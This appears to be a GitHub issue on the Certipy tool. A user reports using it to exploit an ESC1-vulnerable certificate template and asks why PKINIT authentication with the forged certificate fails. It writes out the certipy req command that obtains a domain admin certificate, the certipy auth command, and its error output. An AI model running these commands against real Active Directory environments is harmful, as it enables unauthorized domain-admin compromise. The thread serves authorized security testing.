-
-
Notifications
You must be signed in to change notification settings - Fork 434
Description
Hello!
Certipy has identified a number of templates in this environment vulnerable to ESC1. I've done:
certipy req 'victim.domain/myuser@fqdn.of.ca.server' -ca 'CA-NAME' -template 'VULNERABLETEMPLATE' -k -no-pass -alt 'domainadmin@victim.domain'
I got a domainadmin.pfx and I'm ready to test it out.
When I do certipy auth -pfx domainadmin.pfx -dc-ip ip.of.domain.controller I get:
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
Upon checking this repo's issues, I came across this one leading me to believe I can use this blog/tool to abuse this path via Linux, but from your blog it's my understanding that if the CA is fully patched, this is a dead end.
To further confuse me, this blog makes me think abuse still is possible, but this content looks to be specifically about abuse when you've obtained the cert for a domain controller (which I have not).
Would you point me in the right direction - just so I'm not chasing a dead end?